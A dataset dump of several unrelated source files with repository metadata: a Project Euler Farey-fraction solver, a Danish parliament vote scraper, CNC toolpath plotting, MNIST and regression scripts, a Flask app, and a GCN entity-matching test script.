"line_number": 89,
"usage_type": "call"
},
{
"api_name": "numpy.int64",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "numpy.size",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "numpy.intersect1d",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "numpy.ceil",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "numpy.size",
"line_number": 112,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 113,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "numpy.intersect1d",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "numpy.ceil",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 137,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 146,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 149,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 151,
"usage_type": "call"
},
{
"api_name": "MyTicToc.tic",
"line_number": 159,
"usage_type": "call"
},
{
"api_name": "CoupledHeatWaterFlowTHe.IntegrateCHWF",
"line_number": 160,
"usage_type": "call"
},
{
"api_name": "MyTicToc.toc",
"line_number": 161,
"usage_type": "call"
},
{
"api_name": "CoupledHeatWaterFlowTHe.thFun",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "CoupledHeatWaterFlowTHe.WatFlux",
"line_number": 166,
"usage_type": "call"
},
{
"api_name": "CoupledHeatWaterFlowTHe.HeatFlux",
"line_number": 167,
"usage_type": "call"
},
{
"api_name": "seaborn.set",
"line_number": 173,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.close",
"line_number": 174,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 174,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 175,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 175,
"usage_type": "name"
},
{
"api_name": "numpy.arange",
"line_number": 176,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 183,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 183,
"usage_type": "name"
},
{
"api_name": "numpy.arange",
"line_number": 184,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 190,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 190,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 198,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 198,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 206,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 206,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 214,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 214,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 220,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 220,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 228,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 228,
"usage_type": "name"
}
] |
26470959901
|
""" Problem 71: Ordered Fractions
https://projecteuler.net/problem=71
Goal: By listing the set of reduced proper fractions for d <= N in ascending
order of size, find the numerator and denominator of the fraction immediately to
the left of n/d.
Constraints: 1 <= n < d <= 1e9, gcd(n, d) == 1, d < N <= 1e15
Reduced Proper Fraction: A fraction n/d, where n & d are positive integers,
n < d, and gcd(n, d) == 1.
Farey Sequence: A sequence of completely reduced fractions, either between 0 and
1, or which when in reduced terms have denominators <= N, arranged in order of
increasing size. The sequence optionally begins with 0/1 and ends with 1/1 if
restricted. The middle term of a Farey sequence is always 1/2 for N > 1.
e.g. if d <= 8, the Farey sequence would be ->
1/8, 1/7, 1/6, 1/5, 1/4, 2/7, 1/3, 3/8, 2/5, 3/7, 1/2, 4/7, 3/5,
5/8, 2/3, 5/7, 3/4, 4/5, 5/6, 6/7, 7/8
e.g.: N = 8, n = 3, d = 7
ans = 2/5
"""
from fractions import Fraction
from math import gcd
def left_farey_neighbour(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution finds Farey sequence neighbours based on the following:
If a/b and n/d are neighbours, with a/b < n/d, then their difference:
n/d - a/b = (nb - ad)/(db)
with nb - ad = 1, it becomes ->
n/d - a/b = 1/(db)
A mediant fraction can be found between 2 neighbours using:
p/q = (a + n)/(b + d)
This solution could also be implemented similarly using a Stern-Brocot Tree
fraction search algorithm that uses binary search to recursively find the
target fraction n/d starting from the left & right ancestors, 0/1 & 1/0. Once
found, the last left boundary is used with the target to find all mediants
until a new mediant's denominator exceeds limit.
SPEED (WORSE)
12.03s for N = 1e7
SPEED (Impossible for N > 1e10)
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
upper_bound = Fraction(n, d)
lower_bound = Fraction(n, d + 1) if d != limit else Fraction(n - 1, d)
half = Fraction(1, 2)
if lower_bound < half < upper_bound:
lower_bound = half
neighbour = Fraction()
while True:
delta = upper_bound - lower_bound
neighbour_delta = Fraction(1, lower_bound.denominator * d)
if delta == neighbour_delta:
neighbour = lower_bound
lower_bound = Fraction(
lower_bound.numerator + n,
lower_bound.denominator + d
)
if lower_bound.denominator > limit and neighbour != Fraction():
break
return neighbour.numerator, neighbour.denominator
def compare_fractions(
fraction_a: tuple[int, int],
fraction_b: tuple[int, int]
) -> int:
"""
Rather than compare Doubles, whole numbers are compared based on the
property that:
if a/b < n/d, then ad < bn
:returns: -1 if fraction_a < fraction_b; 1 if fraction_a > fraction_b; 0 if
both equal.
"""
left = fraction_a[0] * fraction_b[1]
right = fraction_a[1] * fraction_b[0]
if left == right:
return 0
return -1 if left < right else 1
def reduce_fraction(numerator: int, denominator: int) -> tuple[int, int]:
divisor = gcd(numerator, denominator)
return numerator // divisor, denominator // divisor
def left_farey_neighbour_improved(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution improved based on the following:
For each denominator b up to N, the only fraction that needs to be considered
is the one with the largest numerator a for which a/b < n/d.
a/b < n/d becomes ad < bn, which means ad <= bn - 1
a <= floor((bn - 1)/d)
for b <= N, floor((bn - 1)/d)/b is the largest fraction.
Fractions with larger denominators are spaced more closely than those with
smaller denominators, so iterating backwards starting at N means the largest
neighbour below n/d will be found sooner. The loop is broken based on the
aforementioned property that:
the difference between 2 neighbours is given as 1/(db)
for a new fraction r/s to be closer to n/d than a/b ->
1/(ds) < (nb - da)/(db) -> s > b/(nb - da)
if delta = nb - da = 1, this means s > b, & the loop can be broken as all
denominators between b and N have already been examined.
N.B. Using the Fraction class from the fractions library is helpful as an
instance intrinsically reduces itself & comparisons & arithmetic operations
are more easily implemented; however, its use reduced the execution speed to
405.98s for N = 1e15, a ~4x reduction in performance.
SPEED (BETTER)
3.9e4ns for N = 1e7
SPEED (BETTER)
93.99s for N = 1e15
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
closest_neighbour = 0, 1
b = limit # current denominator starts at provided limit
min_b = 1
while b >= min_b:
a = (b * n - 1) // d # current numerator
current = a, b
# if closest_a / closest_b < current_a / current_b
if compare_fractions(closest_neighbour, current) == -1:
closest_neighbour = reduce_fraction(a, b)
delta = n * b - d * a
min_b = b // delta + 1
b -= 1
return closest_neighbour
def extended_gcd(n1: int, n2: int) -> tuple[int, int, int]:
"""
Implements the Extended Euclidean Algorithm that calculates, in addition to
gcd(n1, n2), the coefficients of Bezout's identity, integers x and y
such that:
ax + by = gcd(a, b)
:returns: Tuple of (gcd, x, y).
:raises ValueError: If either n1 or n2 is less than 0.
"""
if n1 < 0 or n2 < 0:
raise ValueError("Integers should not be negative")
if n1 == 0:
return n2, 0, 1
e_gcd, x, y = extended_gcd(n2 % n1, n1)
return e_gcd, y - n2 // n1 * x, x
def left_farey_neighbour_optimised(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution optimised by taking advantage of the Extended Euclidean Algorithm
that generates coefficients x and y, in addition to the gcd.
When a and b are co-prime, x will be the modular multiplicative inverse of
a % b and y will be the modular multiplicative inverse of b % a. Remember
that the modular multiplicative inverse of an integer a is an integer x such
that the product ax is congruent to 1 with respect to the modulus b.
SPEED (BEST)
5700ns for N = 1e7
SPEED (BEST)
1.9e4ns for N = 1e15
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
# Python modulus intrinsically handles cases when x is negative
mod_inverse_of_n = extended_gcd(n, d)[1] % d
new_d = limit % d - mod_inverse_of_n
if new_d < 0:
new_d += d
neighbour_denom = limit - new_d
neighbour_num = (neighbour_denom * n - 1) // d
return neighbour_num, neighbour_denom
|
bog-walk/project-euler-python
|
solution/batch7/problem71.py
|
problem71.py
|
py
| 7,025 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "fractions.Fraction",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "math.gcd",
"line_number": 102,
"usage_type": "call"
}
] |
3739410797
|
import requests
from bs4 import BeautifulSoup
import re
def get_vote_links(current_page):
"""Finds the vote page links on the main folktingspage.
Args:
main_page_soup (_type_): Takes in the main page with all the vote subpages as a soap object
Returns:
_type_: Returns a list of soap Objects with the links to the respective subpages
"""
prefix = 'https://www.ft.dk/'
a = current_page.find_all(attrs={'class':'column-documents__link'})
a = [prefix+x['href'] for x in a]
return a
def get_soup_page(url_page):
"""Converts URL into a BeautifulSoup object.
Args:
url_page (_type_): takes a URL page as input parsed as a string.
Returns:
_type_: returns a BeautifulSoup object.
"""
response = requests.get(url_page)
page = BeautifulSoup(response.content, 'html.parser')
return page
def get_votes_by_party(vote_page) -> dict:
""" Takes a BeautifulSoup object and retrieves the votes by party
section, then strips it and modifies it so that it is returned in a fixed sized
dictionary containing parties, For, Against, Neutral counts.
Args:
vote_page (_type_): URL for the folketings vote_page
(e.g., https://www.ft.dk/samling/20042/afstemning/64.htm)
Returns:
dict: fixed sized dictionary containing parties, For, Against, Neutral, absent counts for each party
"""
table = vote_page.find("div", {"id":"tingdok_accordion_vote-2"})
dict = {'parties': [], 'For': [], 'Against':[], 'Neutral':[], 'Absent':[]}
regex_party = re.compile(r"\w* \(\w+\)")
regex_vote_num = re.compile(r"\d+")
for child in table.table.tbody.children:
if re.search(regex_party, child.text.strip()):
lst = child.text.strip().split("\r\n")
votes = []
for i in lst:
i = i.strip()
if re.search(regex_party,i):
party = i
dict['parties'].append(party)
elif re.search(regex_vote_num, i):
votes.append(i)
dict['For'].append(votes[0])
dict['Against'].append(votes[1])
dict['Neutral'].append(votes[2])
dict['Absent'].append(votes[3])
return dict
def get_votes(vote_page):
vote_section = vote_page.find("div", {"id": "tingdok_accordion_vote-3"})
votes = {
'politician': [],
'party': [],
'vote': []
}
for child in vote_section.tbody.children:
lst = child.text.strip().split("\n\r")
if len(lst) == 3:
person, party, vote = [x.strip() for x in lst]
votes['politician'].append(person)
votes['party'].append(party)
votes['vote'].append(vote)
return votes
def get_description_page(vote_page):
description_link = vote_page.find("a", {"class":"tingdok-backarrow"})
prefix = 'https://www.ft.dk/'
response = requests.get(prefix + description_link['href'])
description_page = BeautifulSoup(response.content, 'html.parser')
return description_page
def get_vote_info(description_page):
description_texts = description_page.find('div', {"class":"tingdok__caseinfospot-a__container"}).text.strip().splitlines()
info = []
for line in description_texts:
if line.strip() != "":
info.append(line.strip())
return info
def get_vote_id(vote_page):
return vote_page.h2.text
def get_title(description_page):
top_header = description_page.find("div", {"class":"tingdok__caseinfotopspot-a__container"})
return top_header.h1.text.strip()
def get_vote_caller(description_page):
top_header = description_page.find("div", {"class":"tingdok__caseinfotopspot-a__container"})
hosts_section = top_header.find("div", {"class":"tingdok-normal"})
meeting_hosts = []
for line in hosts_section:
clean_line = line.text.strip()
if len(clean_line)>5:
meeting_hosts.append(clean_line)
return meeting_hosts
def get_next_page(current_page):
next_page_url = current_page.find("a", {"title":"Næste"})['href']
prefix = "https://www.ft.dk/dokumenter/dokumentlister/afstemninger"
np_response = requests.get(prefix + next_page_url)
return BeautifulSoup(np_response.content, 'html.parser')
def exists_next_page(current_page):
if current_page.find("a", {"title":"Næste"})['href'] != None:
return True
else:
False
|
jonahank/Vote-Prediction-Model
|
utils/scraper_functions.py
|
scraper_functions.py
|
py
| 4,617 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "requests.get",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 139,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 140,
"usage_type": "call"
}
] |
1708447421
|
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
import ball_endmill
from utility import mm_to_inch
from utility import plot_circle
def plot_spheremill_toolpos(params):
# Extract parameters
diam_tool = params['diam_tool']
diam_sphere = params['diam_sphere']
tab_thickness = params['tab_thickness']
offset_z = params['center_z'] + 0.5*diam_sphere
margin = params['margin']
# Plot sphere
cx_sphere = 0.0
cy_sphere = -0.5*diam_sphere + offset_z
plot_circle(cx_sphere, cy_sphere, 0.5*diam_sphere)
plot_circle(cx_sphere, cy_sphere, 0.5*diam_sphere+margin,'c')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere, cy_sphere], 'k')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere+0.5*tab_thickness, cy_sphere+0.5*tab_thickness], 'b')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere-0.5*tab_thickness, cy_sphere-0.5*tab_thickness], 'b')
# Plot ball nose end mills
toolpath_annulus_data = ball_endmill.get_toolpath_annulus_data(params)
for data in toolpath_annulus_data:
for sgn in (1,-1):
radius = sgn*data['radius']
step_z = data['step_z']
plot_circle(radius, step_z+0.5*diam_tool, 0.5*diam_tool,color='g')
plt.plot([radius], [step_z+0.5*diam_tool], '.g')
plt.plot([radius], [step_z], 'xr')
#plt.plot([radius, 0.0], [step_z+0.5*diam_tool,params['center_z']], 'r')
# Plot material boundaries
dx = 2*params['diam_sphere']
dy = 2*params['center_z']
plt.plot([-dx, dx], [0, 0],'k')
plt.plot([-dx, dx], [dy, dy], 'k')
# -----------------------------------------------------------------------------
if __name__ == '__main__':
params = {
'diam_sphere' : mm_to_inch(12.0),
'diam_tool' : 1.0/8.0 ,
'margin' : 0.0,
'step_size' : 0.01,
'tab_thickness' : 0.02,
'center_z' : -0.75/2.0,
}
fig_num = 1
plt.figure(fig_num)
plot_spheremill_toolpos(params)
plt.axis('equal')
plt.grid('on')
plt.show()
|
willdickson/sphere_mill_gcode
|
sphere_mill_gcode/ball_endmill_viz.py
|
ball_endmill_viz.py
|
py
| 2,135 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "utility.plot_circle",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "utility.plot_circle",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "ball_endmill.get_toolpath_annulus_data",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "utility.plot_circle",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 43,
"usage_type": "name"
},
{
"api_name": "utility.mm_to_inch",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.axis",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 62,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.grid",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 64,
"usage_type": "name"
}
] |
10933119158
|
import os
import cv2 # commutator vision
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
mnist = tf.keras.datasets.mnist # The hand number nad what it is
(x_train, y_train), (x_test, y_test) = mnist.load_data() # split to training data and test data || x is the pixle data y is what Number
x_train = tf.keras.utils.normalize(x_train, axis=1) # make all valus 0 to 1 instaed of 1-255
x_test = tf.keras.utils.normalize(x_test, axis=1)
model = tf.keras.models.Sequential()
model.add(tf.keras.layers.Flatten(input_shape=(28, 28))) # makes grid of pixles into one big line of 7840 pixles
model.add(tf.keras.layers.Dense(236, activation='relu')) # rectify linior unit
model.add(tf.keras.layers.Dense(10, activation="softmax")) # output layer || softmax = pick the most confident nuron
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.fit(x_train, y_train, epochs=3) # Train model || epoch = how many time brain sees same data
model.save('HandWriteModel.model')
#model = tf.keras.models.load_model('HandWriteModel')
image_number = 1
while os.path.isfile(f"DigetsByMe\\diget{image_number}.png"):
try:
img = cv2.imread(f"DigetsByMe\\diget{image_number}.png")[:,:,0] # rgb?
img = np.invert(np.array([img]))
prediction = model.predict(img)
print(f"The number is {np.argmax(prediction)}")
plt.imshow(img[0], cmap=plt.cm.binary)
plt.show()
except:
print("Img is probable not 28 by 28")
finally:
image_number += 1
loss, accuracy = model.evaluate(x_test, y_test)
print(loss)
print(accuracy)
|
Zippy-boy/HandDigets
|
main.py
|
main.py
|
py
| 1,658 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "tensorflow.keras",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.utils.normalize",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.utils.normalize",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.models.Sequential",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.layers.Flatten",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.layers.Dense",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.layers.Dense",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.isfile",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "cv2.imread",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.invert",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.argmax",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.imshow",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.cm",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 37,
"usage_type": "name"
}
] |
38466019670
|
__author__ = 'christiaanleysen'
import features.featureMaker as fm
from sklearn.metrics import mean_absolute_error
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn import preprocessing
'''
This file is used to calculate the linear regression
'''
def predictConsumption(trainSetX, trainSetY, testSetX, testSetY,tune_params=True,scaled=False):
"""
predicts the consumption
Parameters:
-----------
trainSetX: training feature set
trainSetY: training value set
testSetX: test feature set
testSetY: test value set
Returns:
--------
a prediction of the consumption
"""
if scaled:
trainSetX = np.asarray([preprocessing.scale(element)for element in trainSetX])
#trainSetY =preprocessing.scale(trainSetY,axis=0)
testSetX = np.asarray([preprocessing.scale(element )for element in testSetX])
#testSetY =preprocessing.scale(testSetY,axis=0)
OLS = LinearRegression()
OLS.fit(trainSetX,trainSetY)# fit default model (mean zero & rbf kernel) with data
predictedSetY = OLS.predict(testSetX)
MAE = mean_absolute_error(testSetY,predictedSetY)
if np.mean(np.mean(testSetY)) == 0:
MRE = 50
else:
MRE = (MAE/(np.mean(testSetY)))*100
return predictedSetY,testSetY,MAE,MRE
|
chrike-platinum/Thesis-Gaussian-process-regression-clustering-and-prediction-of-energy-consumption
|
Methods/LinRegPrediction.py
|
LinRegPrediction.py
|
py
| 1,353 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "numpy.asarray",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing.scale",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "numpy.asarray",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing.scale",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "sklearn.linear_model.LinearRegression",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.mean_absolute_error",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 44,
"usage_type": "call"
}
] |
27267969236
|
from flask import Flask, render_template
from shp_display import *
app = Flask(__name__)
def script():
return ['hades2']
def get_table(db):
db = db
script = "<table>"
# Header Generator
code = "<tr>"
for s in db:
if str(s) != "MULTIPOLYGON" and str(s) != 'geometry':
code = code + "<th>" + str(s) + "</th>"
script = script + code
# Data Generator
for i in range(len(db.index)):
code = "<tr>"
for item in list(db.loc[i]):
if not str(item).startswith("MULTIPOLYGON") and not str(item).startswith("POLYGON "):
code = code + "<td>" + str(item) + "</td>"
code = code + "</tr>"
script = script + code
script = script + "</table>"
return script
@app.route('/')
def index():
value = script()
return render_template('index.html',
entry1=value[0],
path_to_image=some[0],
lis=some[1].shape,
table_n=get_table(some[1])
)
@app.route('/up_pop')
def up_pop():
some = get_file()
return render_template('up_population.html',
table_n=get_table(some[1]),
path_to_image=some[0])
if __name__ == "__main__":
app.run(debug=True, host='10.68.69.29')
|
nitish8090/Watershed_Modules_Py3
|
flask_app/app.py
|
app.py
|
py
| 1,373 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 49,
"usage_type": "call"
}
] |
74099804029
|
import os
import os.path as osp
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pandas as pd
import argparse
from dataset import collate_fn, MergedMatchingDataset
from torch.utils.data import DataLoader
from EmbedModel import EmbedModel
from GCN import gcn
from logger import set_logger
from utils import _read_csv, accuracy
def fetch_edge(batch):
edges = []
types = []
for ex in batch:
type = ex["type"]
center_id = ex["center"][0]
neighbors = []
if "neighbors_mask" in ex:
for i, n in enumerate(ex["neighbors"]):
if ex["neighbors_mask"][i] == 0:
continue
neighbors.append(n)
else:
neighbors = ex["neighbors"]
if type == 'l':
edges += [[center_id, n[0]] for n in neighbors]
types += [0] * len(neighbors)
elif type == 'r':
edges += [[n[0], center_id] for n in neighbors]
types += [1] * len(neighbors)
else:
raise NotImplementedError
return edges, types
def calculate_f1(edges, scores, labels, types, score_type='left'):
score_dict={}
for i, edge in enumerate(edges):
score = scores[i]
label = labels[i]
e = tuple(edge)
if e in score_dict:
assert score_dict[e][1] == label
if score_type == 'max':
score_dict[e] = (max(score_dict[e][0],score),label)
elif score_type == 'mean':
score_dict[e] = ((score_dict[e][0] + score) / 2.0, label)
elif score_type == 'min':
score_dict[e] = (min(score_dict[e][0], score), label)
else:
raise NotImplementedError
else:
score_dict[e] = (score,label)
score_label = score_dict.values()
scores = np.asarray([i[0] for i in score_label])
label = np.asarray([i[1] for i in score_label])
pred = (scores > 0.5).astype('int')
TP = np.sum((pred == 1) * (label == 1))
TN = np.sum((pred == 0) * (label == 0))
FP = np.sum((pred == 1) * (label == 0))
FN = np.sum((pred == 0) * (label == 1))
acc = (TP + TN) * 1.0 / (TP + TN + FN + FP)
if TP == 0:
p = r = f1 =0.0
else:
p = TP * 1.0 / (TP + FP)
r = TP * 1.0 / (TP + FN)
f1 = 2 * p * r / (p + r)
return p, r, f1, acc, score_dict
def test(iter,logger,model,embed_model,crit,test_step=None,tf_logger=None,score_type='mean', prefix='Test'):
model.eval()
embed_model.eval()
edges = []
scores = []
labels = []
types = []
for j, batch in enumerate(iter):
with torch.no_grad():
edge,type = fetch_edge(batch)
feature, A, label, masks = embed_model(batch)
masks = masks.view(-1)
label = label.view(-1)[masks == 1].long()
pred = model(feature, A)
pred = pred[masks == 1]
loss = crit(pred, label)
pred = F.softmax(pred, dim=1)
p, r, acc = accuracy(pred, label)
logger.info(
'{}\t[{:d}/{:d}]\tLoss {:.3f}\tAccuracy {:.3f}\tPrecison {:.3f}\tRecall {:.3f}'.format(prefix,j+1,len(iter),loss,acc,
p, r))
assert pred.shape[0] == label.shape[0]
scores += pred[:,1].detach().cpu().numpy().tolist()
edges += edge
labels += label.detach().cpu().numpy().tolist()
types += type
edges = np.asarray(edges)
scores = np.asarray(scores)
labels = np.asarray(labels)
types = np.asarray(types)
if not isinstance(score_type,list):
score_type = [score_type]
f1s = []
for t in score_type:
p, r, f1, acc, score_dict = calculate_f1(edges, scores, labels, types, score_type=t.lower())
f1s.append(f1)
logger.info('{}\t{}\tPrecison {:.3f}\tRecall {:.3f}\tF1-score {:.3f}\tAccuracy {:.3f}'.format(prefix, t, p, r, f1, acc))
if tf_logger:
tf_logger.add_scalar('{}/{}/Precision'.format(prefix, t), p, test_step)
tf_logger.add_scalar('{}/{}/Recall'.format(prefix, t), r, test_step)
tf_logger.add_scalar('{}/{}/f1Score'.format(prefix, t), f1, test_step)
tf_logger.add_scalar('{}/{}/Accuracy'.format(prefix, t), acc, test_step)
return f1s
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# misc
working_dir = osp.dirname(osp.abspath(__file__))
parser.add_argument('--seed', default=1, type=int)
parser.add_argument('--score_type', type=str, nargs='+')
# Test args
parser.add_argument('--batch_size', type=int, default=8)
parser.add_argument('--tableA_path', type=str)
parser.add_argument('--tableB_path', type=str)
parser.add_argument('--train_path', type=str)
parser.add_argument('--test_path', type=str)
parser.add_argument('--val_path', type=str)
parser.add_argument('--checkpoint_path', type=str)
# Device
parser.add_argument('--gpu', type=int, default=[0], nargs='+')
# Model
parser.add_argument('--gcn_layer', default=1, type=int)
args = parser.parse_args()
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
tableA = _read_csv(args.tableA_path)
tableB = _read_csv(args.tableB_path)
useful_field_num = len(tableA.columns) - 1
